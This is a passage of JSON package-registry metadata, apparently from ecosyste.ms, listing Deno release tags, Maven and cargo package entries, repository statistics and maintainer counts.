odeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T13:54:32.801Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":31.517641743763917,"dependent_packages_count":45.05979389543345,"stargazers_count":0.019289227680756138,"forks_count":1.2980935813308854,"docker_downloads_count":null,"average":19.473704612052252},"purl":"pkg:maven/org.mvnpm.at.deno/darwin-x64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-x64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-x64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:darwin-x64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-x64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":622178,"maintainers_count":0,"namespaces_count":82612,"keywords_count":37065,"github":"maven-central","metadata":{"funded_packages_count":49047,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-08T05:02:10.551Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4047508,"name":"deno_typescript","ecosystem":"cargo","description":"To compile TypeScript to a snapshot during build.rs","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":45,"first_release_published_at":"2019-08-15T07:44:12.176Z","latest_release_published_at":"2020-07-13T17:13:37.376Z","latest_release_number":"0.49.0","last_synced_at":"2026-09-07T22:55:06.006Z","created_at":"2022-04-12T10:01:21.314Z","updated_at":"2026-09-07T22:55:06.009Z","registry_url":"https://crates.io/crates/deno_typescript/","install_command":"cargo install deno_typescript","documentation_url":"https://docs.rs/deno_typescript/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively 